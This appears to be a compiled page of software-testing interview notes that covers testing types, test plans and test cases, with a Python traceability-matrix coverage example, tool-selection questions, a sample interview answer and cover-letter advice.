End-to-end testing – Similar to system testing; involves testing a complete application environment in a situation that mimics real-world use, such as interacting with a database, using network communications, or interacting with other hardware, applications or systems if appropriate.

Acceptance testing – Normally this type of testing is done to verify whether the system meets the customer-specified requirements. The user or customer does this testing to determine whether to accept the application.

Usability testing – A user-friendliness check. The application flow is tested: can a new user understand the application easily, and is proper help documented wherever a user might get stuck? Basically, system navigation is checked in this testing.

Install/uninstall testing – Tested for full, partial or upgrade install/uninstall processes on different operating systems under different hardware and software environments.

Compatibility testing – Testing how well software performs in a particular hardware/software/operating system/network environment and in different combinations of the above.

Recovery testing – Testing how well a system recovers from crashes, hardware failures, or other catastrophic problems.

What is a test plan?

A test plan can be defined as a document describing the scope, approach, resources, and schedule of intended testing activities.

It identifies test items, the features to be tested, the testing tasks, who will do each task, and any risks requiring contingency planning.

In other words, a test plan is a strategic document for carrying out testing. It consists of the test plan ID, reference documents, revision history, test schedules, test items, test process, resources, risks and mitigations, training and other such information.

What is a test case?

Test cases are the implementation of a test case design which helps the software tester detect defects in the application or system being tested. This should be the primary goal of any test case or set of test cases. When I write a test case, I think of both types of test cases: positive test cases and negative test cases. Positive test cases execute the happy path in the application and make sure that the happy path works fine. Negative test cases, as the name suggests, are destructive test cases documented with some out-of-the-box thinking to break the system.

In other words, a test case is a document that describes an input, action or event and an expected response, to determine whether a feature of an application is working correctly. A test case should contain particulars such as the test case identifier, test case name, objective, test conditions/setup, input data requirements, steps and expected results.

What is End-to-End testing?

Testing a complete application environment in a situation that mimics real-world use, such as interacting with a database, using network communications, or interacting with other hardware, applications, or systems if appropriate.

What is the difference between re-testing and regression testing?

Retesting: Testing the same test cases in the same build with different inputs.

Regression testing: Attempts to verify that the application works as specified even after enhancements or bug fixes have been made to it.

What is test coverage?

Test coverage measures, in some specific way, the amount of testing performed by a set of tests (which were derived in some other way, e.g. using specification-based techniques). Wherever we can count things and tell whether or not each of those things has been exercised by some test, we can measure coverage.
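The traceability matrix (Q6) and test coverage answers above are where a tester turns a list of requirements and test cases into numbers. The following is an added example, not part of the workbook: it builds the matrix from constructed sample requirement and test case IDs and reports which requirements are untested, which are mapped only to failing or not-run tests, and which test cases trace to no requirement at all.

```python
# Added example (not from the workbook): build a traceability matrix from
# constructed sample data and measure requirements coverage from it.

# Constructed sample data: requirement id -> short description.
REQUIREMENTS = {
    "REQ-01": "Login with valid credentials",
    "REQ-02": "Lock account after 5 failed logins",
    "REQ-03": "Password reset by e-mail",
    "REQ-04": "Session expires after 15 minutes idle",
}

# Constructed sample data: test case id -> (requirements exercised, last result).
TEST_CASES = {
    "TC-001": (["REQ-01"], "pass"),
    "TC-002": (["REQ-01", "REQ-02"], "pass"),
    "TC-003": (["REQ-02"], "fail"),
    "TC-004": (["REQ-03"], "not run"),
    "TC-005": ([], "pass"),  # orphan: traces to no requirement
}

def build_matrix(requirements, test_cases):
    """Map every requirement to the test cases that exercise it; requirements
    with no test case keep an empty list so gaps are visible, not silent."""
    matrix = {req: [] for req in requirements}
    for tc_id, (reqs, _result) in test_cases.items():
        for req in reqs:
            matrix.setdefault(req, []).append(tc_id)
    return matrix

def coverage_report(requirements, test_cases):
    """Summarise coverage: untested requirements (no mapped test), unverified
    ones (mapped only to failing or not-run tests), orphan tests (trace to no
    requirement) and the percentage of requirements with a passing test."""
    matrix = build_matrix(requirements, test_cases)
    untested = sorted(r for r, tcs in matrix.items() if not tcs)
    unverified = sorted(r for r, tcs in matrix.items()
                        if tcs and not any(test_cases[t][1] == "pass" for t in tcs))
    orphans = sorted(t for t, (reqs, _) in test_cases.items() if not reqs)
    verified = [r for r in requirements if r not in untested and r not in unverified]
    percent = round(100.0 * len(verified) / len(requirements), 1) if requirements else 0.0
    return {"matrix": matrix, "untested": untested, "unverified": unverified,
            "orphans": orphans, "percent": percent}

if __name__ == "__main__":
    report = coverage_report(REQUIREMENTS, TEST_CASES)
    for req, tcs in report["matrix"].items():
        print(f"{req}  {REQUIREMENTS[req]:40} {', '.join(tcs) or '-'}")
    print("untested:", report["untested"], "unverified:", report["unverified"])
    print("orphan tests:", report["orphans"], "coverage:", report["percent"], "%")
```

With the sample data, REQ-04 is untested, REQ-03 is unverified, TC-005 is an orphan, and verified coverage is 50.0 %.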

1. What are our primary objectives for a tool?

2. Describe the organization's development and testing process / methodology.

3. What type(s) of testing are we doing currently?

4. What tools do we currently own / maintain? (Purchased and homegrown)

5. What language(s) is our application developed in?

6. Is the application web or browser based? If so, which browsers and versions do we test on?

7. What operating systems do we test on?

8. Are there any third-party controls or grids?

9. Are there any ActiveX controls?


10. Do we need to test server-side COM objects or other parts of our application not accessed by a GUI?

11. Describe the application architecture.

12. What is the communication protocol between the different tiers of the application?

13. What databases does our application work with?

14. How do we create our test data?

15. Are we trying to validate data in the GUI, the back-end database, or both?

16. How often does our group test new builds of applications?

17. Do we have a dedicated test lab, or would testers be using their own desktops?

18. What amount of money are we budgeting for this project / tool?


Why should I hire you?

I think that I am best suited for this job. I am an efficient team player where teamwork is concerned, and if I am supposed to complete a task in a particular time, I am able to work individually and effectively to meet the deadlines. I can deal with things effectively under pressure. I am also an optimistic, hardworking, self-motivated, detail-oriented and well-organized person. These qualities make me suitable for this job.

How to write a basic cover letter

Basic cover letter

In this paragraph, mention the source of the job vacancy, introduce yourself to the potential employer, mention how you suit the job profile, and make the employer aware of the attached resume. An employer has to decide, based on just one paragraph, whether you should be called for an interview or not. So you need to be very careful while writing a basic cover letter.

Even though a basic cover letter needs to be short and precise, you should not skip any important details that are essential for an employer to know. If you sacrifice any important information for the sake of the format, you might sacrifice your chance of getting an interview call. So always remember: though it is short, be precise and to the point when writing your basic cover letter.

Example of cover letter:


I am interested in the Test Lead position advertised in XXXX. I am currently employed as a senior software test engineer at YYYY Company.

In the second paragraph, write some of your roles and responsibilities in your current company.

To further acquaint you with the specifics of my background, I am enclosing my resume. I hope you will consider me for this position. I look forward to meeting with you and discussing my qualifications in more detail.

Sincerely,